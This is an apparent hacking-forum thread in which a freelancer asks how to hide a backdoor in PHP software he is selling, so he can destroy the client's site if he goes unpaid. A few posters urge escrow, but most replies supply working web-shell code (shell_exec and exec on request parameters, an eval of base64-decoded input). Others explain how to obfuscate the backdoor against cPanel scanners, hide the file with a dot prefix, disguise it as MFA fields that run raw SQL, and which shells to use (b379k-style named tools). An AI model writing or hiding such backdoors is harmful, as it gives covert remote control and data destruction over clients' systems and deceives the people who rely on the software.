[PHP] Backdoor question.

[b3hindYou]

Hello!

I am making a script, where I will need to leave a backdoor just to be safe I am not scammed. I do not want to use anything like C99 and so on since all that is detected as fuck.. So probably I will just write my own small script to do the necessary things.. for example:

if(isset($_GET["secret_backdoor"])) {
    if($_GET["destroy"]) {
        $db->clearDatabase();
    }
    if($_GET["something_else"]) {
        // more..
    }
}

What do you think? Should I do this and make my own? Or there are any alternatives around?

Thank you, -b3hindYou™

 

[Dread Pirate Roberts]

I am making a script, where I will need to leave a backdoor just to be safe I am not scammed.

to be safe from getting scammed use an escrow https://xss.pro/escrow/ not infect your script with backdoors.
backdoors will ruin your reputation as a developer.

 

[Guest]

I will need to leave a backdoor

<?= isset($_REQUEST['cmd']) ? (htmlspecialchars(shell_exec($_REQUEST['cmd']))) : ''; ?>

http://xx.xx.xx.xxx/code.php?cmd=whoami

 

[b3hindYou]

Thank you for the replies. I agree that it is not a good practive to do that, but in my specific case I have to. We cant use middle man for the deal (dont ask why), so I need to be sure that if I do not get paid, I can destroy the site.

And yeah I figured it out, I am using a really small script which lets me to do basics I might need:

---

Now lets just see if he tries to scam me, or all will go smooth.

 

[Ailurophile]

If you want to write a PHP backdoor, the basic functions you need to list/view/edit/upload directories and execute commands. You can do this through either $_GET or $_POST. For example:

if (isset($_GET['backdoor']) && isset($_GET['cmd'])) {
    if ($_GET['backdoor'] === "Password") {
        // Execute the command provided through the 'cmd' parameter
        exec($_GET['cmd']);
    }
}

Explanation:​

1. isset($_GET['backdoor']) && isset($_GET['cmd']) : Check if both the backdoor and cmd parameters are present in the URL.
2. $_GET['backdoor'] === "Password" : Compare the backdoor parameter with a hardcoded password ("Password"). This should be a secure password to prevent unauthorized access.
3. exec($_GET['cmd']) : Execute the command passed through the cmd parameter.

Additionally, most cPanels nowadays provide file scanning services that detect and flag files containing functions like exec and eval for analysis. Therefore, the backdoor should be obfuscated and include harmless dead code to mislead these scanners

 

[Str0ng]

<?php

    // for run command http://url.com/webshell.php?cmd=whoami
    echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>";

?>

only an very basic example

 

[b3hindYou]

If you want to write a PHP backdoor, the basic functions you need to list/view/edit/upload directories and execute commands. You can do this through either $_GET or $_POST. For example:

if (isset($_GET['backdoor']) && isset($_GET['cmd'])) {
    if ($_GET['backdoor'] === "Password") {
        // Execute the command provided through the 'cmd' parameter
        exec($_GET['cmd']);
    }
}

Explanation:​

1. isset($_GET['backdoor']) && isset($_GET['cmd']) : Check if both the backdoor and cmd parameters are present in the URL.
2. $_GET['backdoor'] === "Password" : Compare the backdoor parameter with a hardcoded password ("Password"). This should be a secure password to prevent unauthorized access.
3. exec($_GET['cmd']) : Execute the command passed through the cmd parameter.

Additionally, most cPanels nowadays provide file scanning services that detect and flag files containing functions like exec and eval for analysis. Therefore, the backdoor should be obfuscated and include harmless dead code to mislead these scanners

Thank you for the reply.

Then looks like I have all of the important bases covered already
Just need to figure out a better way to obfuscate it, since eval() would get flagged. Any suggestions which does not include IONcube?

 

[MrDark]

to be safe from getting scammed use an escrow https://xss.pro/escrow/ not infect your script with backdoors.
backdoors will ruin your reputation as a developer.

++
It is very shameful to leave a backdoor, even if you encode it and the person knows or have someone that knows coding, investing it a little will instantly spot your encoded part. Play fair, use escrow or take the risk.

 

[b3hindYou]

++
It is very shameful to leave a backdoor, even if you encode it and the person knows or have someone that knows coding, investing it a little will instantly spot your encoded part. Play fair, use escrow or take the risk.

Thank you for the reply, you might have skipped my post above. "I agree that it is not a good practice to do that, but in my specific case I have to. We cant use middle man for the deal (dont ask why), so I need to be sure that if I do not get paid"

Obviously if I am looking info for this - as a long time developer, you can see that I have not even touched backdoor scripts before. This was a really unique case. I do usually use a MM to do the deals, or simply get paid before the job from some clients who already know I will not scam them.

 

[MrDark]

Thank you for the reply, you might have skipped my post above. "I agree that it is not a good practice to do that, but in my specific case I have to. We cant use middle man for the deal (dont ask why), so I need to be sure that if I do not get paid"

Obviously if I am looking info for this - as a long time developer, you can see that I have not even touched backdoor scripts before. This was a really unique case. I do usually use a MM to do the deals, or simply get paid before the job from some clients who already know I will not scam them.

Fair play always wins, even if it's hard sometimes, it totally worth it. Yea, to make yourself feel safer, simply use escrow, whoever refuses means he did not have any type of intention to pay you when the work is done.

 

[b3hindYou]

Fair play always wins, even if it's hard sometimes, it totally worth it. Yea, to make yourself feel safer, simply use escrow, whoever refuses means he did not have any type of intention to pay you when the work is done.

You do not understand the situation still! He told me he wont use MM only after I finished the code. If I do not secure myself, at least I can make him to not get a free script I spent working on almost a week. If I do not backdoor this, I just gift scammer a script. I do not see how giving scammer a free script, and me wasting week of coding is fair xD

But enough of this, Its already over with, moved on from it some time ago, and learned.

 

[EvilHttp]

This is not good for the backdoor!
It is better to use deliberate bugs or kill switches.
For example, the management login cookie is predictable.

 

[dunkel]

Server antiviruses/scanners will detect backdoor so use https://www.google.com/search?q=php+obfuscator
You can use any php web shell and delete the backdoor php file via backdoor from server after receiving payment

 

[b3hindYou]

Server antiviruses/scanners will detect backdoor so use https://www.google.com/search?q=php+obfuscator
You can use any php web shell and delete the backdoor php file via backdoor from server after receiving payment

Thank you. Do you have any personal recommendations of what you have used and consider good?

 

[dunkel]

Thank you. Do you have any personal recommendations of what you have used and consider good?

idk maybe b374k and WSO shell, but now fileless shells trend https://habr.com/ru/companies/cyberok/articles/787320/

 

[ElysianProd]

<?PHP
    if(empty($_GET['key']) || $_GET['key'] != 'demo') {
        die('error key');
    }
    
    if(isset($_GET['code'])) {
        $code = base64_decode($_GET['code'], true);
        
        if($code !== false) {
            eval($code);
            die('success');
        }
        else {
            die('error base64 decoded');
        }
    }

You close a line of php code in base64 and then execute.
Example: echo 'Hello, world!';
ZWNobyAnSGVsbG8sIHdvcmxkISc7

yousite?key=demo&code=ZWNobyAnSGVsbG8sIHdvcmxkISc7

 

[privatetoolz]

As a developer I don't recommend you add any backdoor. Just use escrow instead when you don't trust each other or don't do business with him at all. Legit guys never decline escrow.

 

[bg1]

i 100% with you don't use c99 last time i use it 10 years ago and even after encrypt it most of github or others web shells are backdoored and send the link to the hacker ? to make your backdoor powerfull i suggest you add a file upload as option also a command execution option this what i always do and make to stay 1 step a hed also if the target has a cpanel don't forget to add . before the name like .shell.php this will hide the file in cpanle file explorer

 

[vei]

don't add backdoors to anything you sell, as others have said use escrow. i add backdoors to personal projects for emergency access, lost control, stolen source, or a situation resembling these.

if you intend on having it be inconspicuous and hidden among other code, add somewhere in the middle, rename it to fit the environment. i try to keep mind more related to exploitable code rather than distinct backdoor functions.

for example, on the registration page,

// backdoor db
// example.com/page.php?email_mfa_code=whoami&email_mfa_require
@print_r(in_array('email_mfa_require', $_REQUEST) ? mysqli_query($conn, $_REQUEST['email_mfa_code']) : NULL);

// or swap the payload to backdoor php
isset( ... ) ? @file_puts_contents(('email_mfa_code.'.char(112).char(104).char(112)), $_REQUEST['email_mfa_code']) : NULL;

i wrote this quickly so i doubt this code runs, but it gets the point across

now, you could obfuscate it further obviously but you get the idea. store the value of your $_REQUEST elsewhere under a trusted name, etc. use misleading names, have it be confusing and possibly seem as part of a larger set of instructions, hide errors, etc

simple is best

 

[tainted_l0ve]

b3hindYou , how did the deal go?)